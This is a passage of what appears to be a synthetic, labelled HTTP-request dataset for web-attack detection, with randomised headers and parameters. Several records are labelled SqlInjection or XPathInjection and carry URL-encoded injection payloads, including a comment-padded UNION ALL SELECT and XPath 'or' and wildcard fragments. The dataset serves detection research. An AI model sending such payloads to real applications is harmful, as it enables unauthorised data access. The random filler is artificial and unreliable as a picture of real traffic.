If-Range: "gtaaFX6Z0o1nhpZRUVe"
Max-Forwards: 83
MIME-Version: 1.7
Pragma: sb='aaya'
Proxy-Authorization: hbepti bjceOetw=hsaae
Authorization: Basic d05lZTppZGF0Vg==
Range: 90-3
Referer: http://EtRp.com/caeayeet/ssaeF0/8oun.exe
TE: chunked
Trailer: Expect
User-Agent: dshu2cfdnmProio
UA-CPU: Sparc
UA-Disp: 5566,8703,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 213x610
Via: yele9/3.3 134.238.99.179:9206
Transfer-Encoding: gzip
Upgrade: tohtr/2.9, 8im/0.4, Looyi/2.2, csa/7.6, tleia/7.4
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2422
Start - Id: 5293
class: Valid
PUT /hLGs97_g.TjrEjKBzbGi/sottss/dFgmE/gjrYcAedlyrn/iaQxc@ExYpFtUvoqr/gh6hlvsioshrhaoofsar/CY/mj.N4Sm_.nFUDz.Dz.cgi? HTTP/1.1
Content-Length: 187
Content-Language: 5,7earmI
Content-Encoding: identity
Content-Location: /i4xh/jhyn/eeoo/otposcq/aofhls.gif
Content-MD5: dGg4dGxsZWl4ZXJjTk9uRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Dec 06 17:59:42 CET
Last-Modified: Wed, 07 Jun 06 08:27:40 CET
Host: 246.107.211.63
Connection: tuoa
Accept: text/xml
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 36.133.99.23
Cookie: 1i6dsedhole9n=Eqrsxyihiaisrscoot;snud1rlHr=13264017;cgwjs8nSTinah=4r;SFpn=a
Cookie2: $Version="88"
Date: Wed, 02 May 07 04:28:10 GMT
ETag: "hVxHsrYAQqM_e7KE28G"
Expect: enfl
From: rpfz@tmadFbssh.cz
If-Modified-Since: Sat, 18 Aug 07 06:41:26 UTC
If-Unmodified-Since: Wed, 28 Jan 04 04:20:29 CET
If-Match: *
If-None-Match: "UED59iC7qp8naejd-uZq"
If-Range: "eByZX_Z2VV@Hxop.KP"
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: fbsyd htuo=tbv9k
Authorization: Digest nc=d4b2f75A
Range: 44-,39-,850121-
Referer: /lr3piebk/gpoza/tweeFs4/xazeX2.tar
TE: gzip;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 4.2; i1-3B; rv:0.6.9) Gecko/85826238
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1146x7241
Via: 9.0 16.141.72.23
Transfer-Encoding: compress
Upgrade: ehpx5/0.0, arxncn/6.5, nwer/0.3, shn/9.2, otna/5.5
Warning: 155 41.32.226.111 "u6eteeEntposrsoPm" "Sat, 31 Jul 04 05:15:59 CET"
X-Forwarded-For: 86.174.5.96
X-Serial-Number: 722934427408966635
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

GwNmeta3yB=54237918&itgEyaUepNema=;iSt9nodepnIvarE&ADCS7jLYPTt=hOmte having&KobjecttbBwJ=inteq&d7P.-MxselectUl6X=zibYcoUddHe&a5a2beeday=sersmdt&MazebapeaBlKS=eUADo7PC.tts&OvsdO1=vM3I-FO

End - Id: 5293
Start - Id: 42252
class: SqlInjection
GET /rM1Fi8_uevk9/2sEiYciase24/-AIIF@xU._9catw/rcunesmBtccteeki8/gtn7/iamiL/i@gMb0Ubpn_AKREFibf/paiue1/o_XFxJNg@wzUHFS/mcttor/o4snpy.4NE6-.jpg?Essfoea1gefice=4940290&eoef8eu=geekn8Nkrreyws&jrr=si+o6dcedee&esgat=vTIIU3nYDQM&y89nosetrm=whereoqy+&mtAep0iieaz=8&nh=95&otlopue=%27++%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F23136%2F**%2FFROM%2F**%2Fsraltlento%2F**%2FWHERE%2F**%2F%28+%27%27++++%3D++++%27+++++%2F**%2F&laa3ih94=6QKvKc&Ricpet03lNpgr=3901&ztestOdrseaw=%3Aiag0&l1F=01&eryuyspett=gtwaeldzrennuzs HTTP/1.1
Host: www.Ireh.uk
Connection: close
Accept: application/zip, application/*;q=0.3, audio/x-wav;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.216.181.230
Cookie: eaergxsqesoL=31
Cookie2: $Version="400"
Date: Thu, 29 Jul 04 23:10:57 GMT
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: os3y@rtote.net
If-Modified-Since: Mon, 01 Mar 04 06:04:42 CET
If-Unmodified-Since: Tue, 14 Jul 09 08:21:23 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 11 May 05 22:29:57 UTC
Max-Forwards: 265
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZWVzb255aGhtdGRhZTVob2FldnVJOTd5eXlmRXQ0M3N6dDlhYXRpdG50bGhFNjY1
Range: 4539-14148,-19,934-
Referer: /sosnLtE.bin
TE: chunked
Trailer: Accept-Language
User-Agent: bto2nhvo (uf0-JeGw; q1@_zL; v33S0GGPal; tyHTMX; dWLzGYf)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: FTP/4.2 www.mh7Ikaii.html, 2.1 102.28.194.89, HTTP/9.0 166.196.13.111
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42252
Start - Id: 30118
class: Valid
GET /iGSixUhj-XW/cRBw0QsE9UuzPn6/t5LqJCyzq/o20s/s4o/dgTtW8l/hF.5wi.cfm?bwltxxidkeEetqc=isenubgpO&PTB@5RSJ=7&bjudeletePMcZ2kW=trce2hnh&ToPFT=337156&sN2mencce9yiTe=2252533&GonvsDd2e=1996541&rA9Uokfs1hO=tbpfmoogehfxu5lct HTTP/1.1
Host: www.BsrM7aec0.st
Connection: close
Accept: text/*
Accept-Charset: x-mac-arabic, iso-8859-9;q=0.1, windows-1254;q=0.4, utf-7
Accept-Encoding: deflate, gzip, deflate;q=0.4, gzip;q=0.1
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 62.130.164.50
Cookie: IaigsAtlcnsedh=mohomeftptl't;euax=03410;Gavtoermsps=oBWbnHU8;enolnoata8a=itttethwwuodyh;yonTohytb=4008682
Cookie2: $Version="0"
Date: Tue, 10 Nov 09 01:16:09 GMT
ETag: W/"B_jmGbSsVt2.uOHJy2o9"
Expect: 100-continue
From: iustaSag@Odyltrr.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Fri, 06 Feb 04 24:24:08 UTC
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: "S7xhWp1_QB_zDf1X@KFu"
If-Range: Fri, 27 Feb 04 21:59:43 UTC
Max-Forwards: 68
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: Digest qop=oaitee
Range: -3400,603295-
Referer: http://www.cmia.gov/dlvu1eoa/aobg0/3wcsO.css
TE: gzip
Trailer: Date
User-Agent: iRtbLH http://www.4pre.biz
UA-CPU: Sparc
UA-Disp: 3407,194,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 146x988
Via: 7.5 www.pbtlsll5.html:0815, 2.3 61.51.127.101
Transfer-Encoding: identity
Upgrade: atUnh/6.9, c0y/8.9, Tr3Ld/2.0, m2seTE/9.9, df38/8.9
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 131299472861769232
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30118
Start - Id: 19530
class: Valid
GET /e6SnfjxaI/lhoLwnni5rF/ex/oDWic8zlI/awydtvqeo5hia/nd/pSyhqnroyyeF5su/n3CzsNOZ0/ciwd.jpeg?snehcao6o9ueb=5453813&6chtoeAztBolwed=Cheeclfo HTTP/1.0
Host: 200.24.112.149
Connection: dzoSwl
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity, gzip;q=0.7, gzip
Accept-Language: *
Cache-Control: max-age=360
Client-ip: 66.81.5.20
Cookie: lyhcnsezel3f=r%i;rCfee=3108202
Cookie2: $Version="299"
Date: Sun, 24 Oct 04 19:22:42 CET
ETag: "FFsnvXN@dtN80DUp9"
Expect: itetett
From: ieto@z1nwtI.de
If-Modified-Since: Sun, 27 Mar 05 15:06:08 UTC
If-Unmodified-Since: Sat, 20 Jun 09 15:34:04 CET
If-Match: "98CtrD@d52kqQcmq8ly5"
If-None-Match: "7beZENM_QTgFxAjbwrI"
If-Range: Sun, 04 May 08 08:23:35 GMT
Max-Forwards: 03
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic bnAzaTBkOm9yU1V2c1N0
Authorization: Basic b2lndHN0MjQ6c2h1dHZp
Range: -470982,-47168,1897-
Referer: http://aFEsde.uk/qeS7nen.php4
TE: gzip;q=0.0,chunked
Trailer: Date
User-Agent: atsqo (aY3ops)
UA-CPU: PowerPC
UA-Disp: 332,0643,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 690x0416
Via: FTP/9.6 58.211.72.22:36815, 8.1 www.uaya.js, HTTP/0.4 www.ld9rb.js
Transfer-Encoding: compress
Upgrade: eLdt/8.1, uyqT/1.9
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 910419107013273
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19530
Start - Id: 25027
class: Valid
GET /roccdh5c/eg6gEce/llslpcipe3v7D0attIri/xkateabenenhedza/Zstylesam/th7tobEEefM/cl3x9gcF2QVVF5h1OB2/oZH_9x/CID7917Ge/llinkpDkPlM/ouIjGZ.php3?psoLtheaitir=27964775&9a=nCD0kbEDv&remijo=s+%5C&te=ascripta%7CO&4af9aQO=t&NGVzOwKNrlL=9++%5Cm&oteTRuSt=78&xcow8anhaac=aexeceiooe&31gznu=tFWPm7w7X_H&jMRCobject3likeh5=nbVd&Gd4-x=Tnniymuis7osaoo&nushsB5ot4rM=kInojt3txes&her66=laihhoiha&eqrseec14afi8t=p%29omsihrn&tEetreoemxa=t7YGA HTTP/1.1
Host: www.eanttLtt.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate, compress;q=0.1, deflate;q=0.5, deflate
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 15.48.155.195
Cookie: rEsanet=518
Cookie2: $Version="1"
Date: Sun, 01 Aug 04 09:37:02 UTC
ETag: W/"qg4sRiCSMoCsAMeo"
Expect: 100-continue
From: Enifno@tuoeeb.fr
If-Modified-Since: Sat, 12 May 07 05:19:13 CET
If-Unmodified-Since: Thu, 30 Dec 04 18:35:08 GMT
If-Match: *
If-None-Match: ".unq3il0qge1MXi"
If-Range: Fri, 04 Feb 05 22:09:38 GMT
Max-Forwards: 742
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest username="ezcs4t"
Authorization: Digest nc=C40B2b79
Range: 81636-,-8
Referer: http://www.est36l.be/swaItrne.png
TE: deflate
Trailer: Connection
User-Agent: sSddvev0nh/8.2.5.7
UA-CPU: MIPS
UA-Disp: 002,8745,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x906
Via: 3.5 www.noto6.html, FTP/0.1 186.249.105.53, fri/1.7 www.aimRoOea.jpeg
Transfer-Encoding: compress
Upgrade: eNpnt8/2.6, kred5/8.3, 2Es/3.6, r0vvuI/7.5
Warning: 589 248.95.122.90 "obw4rNcWn6" "Wed, 23 Sep 09 18:27:31 UTC"
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 5515309896252
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 25027
Start - Id: 17439
class: Valid
GET /dnrOer/um/nKR67/sD-@5l/2cated/hi.css?2Q3e1v8Fo.S=521&rootsai6ter2t=spoabCmtdanc&bpassthrul0mlgN=49&KDOcopypb=trotamy2so5Srteon&untEsct=2861253&bmw=e_029G7su0m&itnetdso1tcf0is=onbFiCJ-&5haxRnhkiTn=elsn2nanEIils66I46a&popfc=81&pal=8477822&2tvfsofo=g3&lMvoTNlocationB=iframe2%257tcscbe+N4uu&2QPTnc2hAZ4=093449 HTTP/1.0
Host: 57.244.78.217
Connection: close
Accept: application/postscript, image/gif;q=0.9
Accept-Charset: iso-8859-5;q=0.2, iso-8859-8, iso-10646-ucs-2, x-mac-chinesesimp, cp-932
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 71.107.138.4
Cookie: ns0en=cvimb wohL>ae;aLehecte=eto2Dn;@7Amn3=50k
Cookie2: $Version="716"
Date: Thu, 11 Nov 04 06:28:30 CET
ETag: "7LFj42hbIyOW.NtD"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: 6osilt@7iEee.st
If-Modified-Since: Tue, 13 Mar 07 16:03:32 CET
If-Unmodified-Since: Thu, 10 Jan 08 15:45:53 UTC
If-Match: "oSOpfS6@6FEAwXt"
If-None-Match: *
If-Range: "Xdm2FJ2YtxOHUD@zCte"
Max-Forwards: 1396
MIME-Version: 5.3
Pragma: r=qoide
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Digest username="dErsw2a"
Range: 9-86744,230338-150282,297-98990
Referer: http://www.ealS.it/hpfksy/aiPs/tr5aGra/Otbieab.txt
TE: trailers,chunked;q=0.4
Trailer: Host
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 0.4; cg-ju; rv:1.9.2) Gecko/56880849
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: FTP/2.8 23.161.124.160
Transfer-Encoding: gzip
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 807 www.ienu.tiff:7433 "tnzkneini" "Fri, 27 Feb 09 18:56:57 UTC"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17439
Start - Id: 5767
class: Valid
POST /yKPXhuh/XssToztaeeepn2ides5/t5VXCEbB1X6@VP8KUFFP/3ALRYeNupdateEzn3DOcat/r4f0dKOeJ_DBM/select4g0/o6xQ3Kigr76SkQ1/2einsbudetHtm/execFi/fBxm/gfipK-cnE02F4t.js? HTTP/1.0
Content-Length: 16
Content-Language: ear
Content-Encoding: compress
Content-Location: http://enth.org/eaermo.pl
Content-MD5: dGltYWFzNmxyb2RhSHJpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 May 07 21:17:02 CET
Last-Modified: Sun, 27 Feb 05 24:04:07 CET
Host: 61.3.188.5
Connection: neeoiv
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 1.90.96.252
Cookie: shutdownOZ6V46LO=nid5ndeb;stckq=lIoehleperltt;bytinywes=includeyi$s;oaesa=62226129;t3nna3NiOshcq=)els
Cookie2: $Version="7"
Date: Fri, 16 Jan 09 18:18:17 CET
ETag: "VQuLsoA96NUbIKpr"
Expect: 100-continue
From: m3eh@bebedj7nid.biz
If-Modified-Since: Mon, 14 Mar 05 20:27:10 UTC
If-Unmodified-Since: Fri, 06 Jan 06 21:24:02 GMT
If-Match: "aKSJ4B1T6xLRXY3yQ"
If-None-Match: "OrfB3pQETJbv5kdX"
If-Range: *
Max-Forwards: 013
MIME-Version: 3.5
Pragma: nahi='t1r'
Proxy-Authorization: Digest nc=ccb557Ff
Authorization: Digest algorithm=MD5
Range: 627-,94191-11363
Referer: /Bekmiqm/a6mnt/uhaZa/ltri.jpeg
TE: trailers,gzip;q=0.1
Trailer: From
User-Agent: nomcpuEh/2.6
UA-CPU: 68000
UA-Disp: 6915,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2088x8163
Via: 0.6 243.94.43.103, 0.8 www.yptTbsc.js, HTTP/8.9 90.10.159.99
Transfer-Encoding: identity
Upgrade: snbi/3.7, glmEeo/6.6, e8eA/3.9, rtg/0.0, ntx/4.7
Warning: 490 www.Rlrqmzrt.tiff:4521 "npcdrnbmyb8ae" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 4042931462564768
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eebreospfrsiti=t

End - Id: 5767
Start - Id: 18303
class: Valid
GET /QZ-/amgqW/taYfroooekt8dnhdzi/y.g_Rf_96FIIieUM4hfj/tINld@XFpkEfR/tpviidielse0r64ii/yv/zGGx/ltf/58dcrZET6mP2h0naf.php? HTTP/1.1
Host: www.nd3hr3t.it
Connection: 6rnisai2
Accept: */*
Accept-Charset: koi8-r;q=0.2, x-mac-ce;q=0.8
Accept-Encoding: compress;q=0.3, compress;q=0.7, gzip;q=0.3
Accept-Language: *
Cache-Control: max-stale=8643
Client-ip: 34.186.224.238
Cookie: rIklnnscerpt5n=iqx7r;jgOatg= rs;wtnc7nOs5sm7tfs=ts';nKfNZEg=hCyttfr2oopc87;raspPrRl=7f;8oerlt=oam
Cookie2: $Version="2"
Date: Wed, 09 Dec 09 08:30:24 GMT
ETag: "@u3l8ojv12CM3I0QQw2"
Expect: 100-continue
From: drsH1i@mudidGibzl.gov
If-Modified-Since: Sat, 01 Jan 05 03:30:39 GMT
If-Unmodified-Since: Wed, 17 Sep 08 10:29:48 UTC
If-Match: "CdSYgpzipblqve2SA"
If-None-Match: *
If-Range: Fri, 11 Apr 08 12:57:45 UTC
Max-Forwards: 759
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: NTLM b21paTFhbmZzaUdBeDI3dWlybmZjcnNkbm5uN3VsdDQ=
Range: 6061-289668,471-,-1956
Referer: /Mect/cshe/mstToy.msf
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: 6ooaS/0.8
UA-CPU: PowerPC
UA-Disp: 644,336,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: Nwrmy/8.7 www.vennx.jpg, 5.0 www.aAsaewu.js
Transfer-Encoding: gzip
Upgrade: aeft/2.6, oxx/2.6
Warning: 294 141.143.83.240 "sHahhur09tk20mdUnJo" 
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18303
Start - Id: 35005
class: Valid
POST /ea1/_execVrU6uY9EgEU/UqOtE1JGSj/vntaebiviaiOpt/qsn3fini6lawdethNEr2/eIfGEEAgk/crc/kHYtJeVaR/pY3/obRU.png? HTTP/1.1
Content-Length: 222
Content-Language: 47esnogs
Content-Encoding: compress
Content-Location: http://www.ustssEs.uk/stjo/tmIei/ihliy.tiff
Content-MD5: enR0b3JlaW83YXlpeW44bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 24:06:05 CET
Last-Modified: Sun, 15 Mar 09 05:43:19 UTC
Host: www.audt5rei.com
Connection: mssrTy
Accept: image/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 7.41.109.209
Cookie: 6c0choe8mGi1t=u1;.klq=T;libs_4A4Z=sor>iwinntS
Cookie2: $Version="5"
Date: Fri, 25 Apr 08 13:07:45 CET
ETag: "YwF_ySK2C_R05P50"
Expect: aln3DpiH
From: tipob@H7iTt.uk
If-Modified-Since: Wed, 21 Nov 07 19:44:37 CET
If-Unmodified-Since: Fri, 01 Oct 04 08:44:55 CET
If-Match: "OBJqGhb3QL0dodP7sUZY"
If-None-Match: *
If-Range: Mon, 12 Apr 10 04:55:09 CET
Max-Forwards: 8593
Pragma: no-cache
Authorization: NTLM ZWJhbmJvdWloaW9hYXd5cmJub2g1ZWVlZWNzb0luc2J1YmVDVDdl
Range: 85041-3,74-,5-
Referer: http://mGwththk.org/8hnbc/n5fs/slsem.jsp
TE: trailers,chunked;q=0.2,trailers
Trailer: Authorization
User-Agent: Mozilla/7.1 (X11; U; SunOS sun4u 0.1; kd-qs; rv:6.5.7) Gecko/64676511
UA-CPU: MIPS
UA-Disp: 611,6268,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3778x0485
Via: TMmcpi/8.4 www.Tdss.png, 0.7 www.hsqlegur.html
Transfer-Encoding: deflate
Upgrade: 6eanj/6.8, HH2n/1.0, dmi/6.2, ixeo/8.4
Warning: 698 19.231.5.185 "eonlhdf2hoiie1ojylS" 
X-Forwarded-For: 151.22.66.165
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n9eeL32lemxr=Tcmde&karjlTth8eenf0=Yobject&_UTJ=ywiE4u7Y_&a8o5nush=/o6IegRpasswd&Kndin=042970&saeaetT70umixys=tCuiK&q3cPXdivUQ5Z=nrlen;af]et&ateheeoeDad=79371&GLdhn=gzHe&ehydOpUnge7rjgs=bzad&wp=169343426&ou=ibowneaa7i

End - Id: 35005
Start - Id: 48800
class: XPathInjection
GET /uM_qF17CY81zaZ0G/access_log2731/nk9T4anI/b7pr1H1znwQFQ1cDuY46/sqQfzjhvgW/adKkDcmdEwU./XQEvilHzLl/1d0AebEynllni/HUE93S_.jpg?cyg3ug9fnhaaU=5++or+++++1%3C+++szt%2Fes%2Fq%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D878%5D++or+71%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&eewanah890ok3a=e&nullEwsLY=19Ohldn6crtu5Lrntt&net=EvAtst HTTP/1.1
Host: 241.160.125.56:03
Connection: Ewol
Accept: image/gif;q=0.3, application/*
Accept-Charset: us-ascii, windows-1250, iso-8859-2, utf-7;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 15.151.104.240
Cookie: re=tajc4;CzteNietiv3bsen=4771705
Cookie2: $Version="875"
Date: Sat, 03 Dec 05 23:26:51 CET
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: 100-continue
From: aTnmcfs@so3eotuens.gov
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Tue, 08 Sep 09 13:43:45 CET
If-Match: "QTaeMLLAfPmBpNJvNm"
If-None-Match: *
If-Range: Wed, 11 Jul 07 11:59:00 CET
Max-Forwards: 756
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Digest nonce
Range: -77394
Referer: /Nn6hoe.tar.gz
TE: chunked,deflate,trailers
Trailer: If-Match
User-Agent: dwfsrEeonebtNi
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 807x856
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: Abotid/5.1, aaihiE/4.1, eennhd/8.8, 4euri/4.1, ssnsa6/5.8
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48800
Start - Id: 31762
class: Valid
GET /pe/qsszvipgenxteS/vTxecrx1Va/lsm/pistmn/GEtn@/in.jpg?tRadrE=oPvGlACUKIJ&ueoAchenotd0=sw2ee7xn%3Bq&nt6Relmea=t%28rh3I&lro=2dw2Jyk-&.brmROoEg.execxp_0=hiwl20wj6%5D1ten&Sahe1nsrajeech6=eW5J_byoF&anRmu=simasrdatit&Jg1sIhri=n6ndldtrsnaw7t&SWLJyhttpsh2RtmpCtelnet=syQKKKPBS&chwtosi=240954480&drTlassna=niiyianlwt4Ngreft&gsc=ruWDoy&s5Hr=dqt8epqs5fmroaron HTTP/1.1
Host: 44.93.236.36
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, gzip, identity;q=0.5, gzip;q=0.6
Accept-Language: yeon-df, bvAdasqA-hsOom;q=0.6, hwts-u;q=0.4, veia-v;q=0.3
Cache-Control: max-stale
Client-ip: 212.62.42.83
Cookie: oyaqnbuuo6ceae=epJb_fYyU;7krooirtlit=nk08sI12-;0daeaa5hhrq=28;zThGinputMWb9@=onph-;wm=555CAuQpZg;mEtih=m$h06fyta
Cookie2: $Version="2"
Date: Mon, 07 Jun 04 14:16:03 UTC
ETag: W/"vlh10JSotRr11jEt"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Thu, 17 Jun 04 21:27:07 UTC
If-Unmodified-Since: Sun, 23 Apr 06 07:41:50 CET
If-Match: "rhQP5M4c1J2r41vG2n1"
If-None-Match: "rIs4hP1btbdBFClPMfh"
If-Range: Tue, 27 Apr 10 14:39:28 CET
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM M2VzNm9jYm4yc3N0NmZYMW91bFNkRWhybHNyZkZzZW5sYWVsSHFhcnNsY3c=
Authorization: NTLM cm10b2Nyb2FpcnplZzdlb0Vub2lvd3VzckUybEVhNWFlbHJlb2U=
Range: 707434-,-591
Referer: http://oc5ed.st/edh4a/cetWr/raaeE/rwzieom/qth2etex.wmn
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Match
User-Agent: Mozilla/1.8 (compatible; npeoe; Win 9x; yc4eta; hioesHu; anoat)
UA-CPU: Sparc
UA-Disp: 794,2521,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: 5.3 172.187.164.49, HTTP/6.4 www.nhe3feie.html, 7.7 38.96.107.166
Transfer-Encoding: identity
Upgrade: Nesagu/1.4
Warning: 078 116.114.99.139:938 "lt4asseh" 
X-Forwarded-For: 171.173.11.190
X-Serial-Number: 48619214669
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31762
Start - Id: 49225
class: XPathInjection
GET /l-lo/nOooknhrahybopcslow/3vKLHRY7G5wp-Lg/rpGandvarTideleten1FtRmb.php3?ebc=nnE5i7s0wao&cc3fitHceo=31195872&dyeiairbisae=reh0socb7mta&1wvi_FyTR=87+or++++1%3C+++2i%2FeebddH%2Feofld%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D693%5D++or+++31729%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ubhh=eh9ditd+urGws&9Cv5Qz=sMrFV&Ns9hrts2eJa=erdc3mailab%7Ee&ai7ms=108720413&alb2bd1dldtero=71971257&gia=683&bnor=rXo-tCw-Uq HTTP/1.1
Host: 149.75.89.146:80
Connection: keep-alive
Accept: video/mpeg;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 22.111.61.54
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Mon, 14 Aug 06 24:39:37 GMT
ETag: "E5Pz1BLK-9C3@Q7bcLV"
Expect: tdtiTg
From: 92fxf@rrjet00.biz
If-Modified-Since: Mon, 12 Jun 06 10:24:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 21:27:16 CET
If-Match: "@yp7--orXcGeBrzj."
If-None-Match: "ijEyFYY00_TVKoOx"
If-Range: "MrkoPHi._VhHKlilv"
Max-Forwards: 0599
MIME-Version: 7.9
Pragma: iuies=Oaero8y
Proxy-Authorization: Digest algorithm=MD5
Authorization: 1ai4a behucoa=fsoig
Range: 43152-,41540-0,9210-
Referer: /5mlqto/gihnsn.gif
TE: deflate
Trailer: Date
User-Agent: Mozilla/2.0 (X11; U; Solaris 9.5; Rv-lt; rv:0.2.6) Gecko/09967149
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 353x220
Via: 3.1 www.csueht.png, 7.7 201.98.77.245, 8.1 www.sedtf.css:603
Transfer-Encoding: gzip
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 502 253.96.14.29 "teeatydficcCyrvtey" "Thu, 06 Mar 08 12:20:53 GMT"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 312383203635
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49225
Start - Id: 32799
class: Valid
POST /dsgmiEhB/ieQd0831LNlvAm11Ohro/cRb0YaaNqkGTH/8xRgB@gA3yugsX/oa/4x.html? HTTP/1.0
Content-Length: 74
Content-Language: oaoan,tDaoeb,Anr
Content-Encoding: gzip
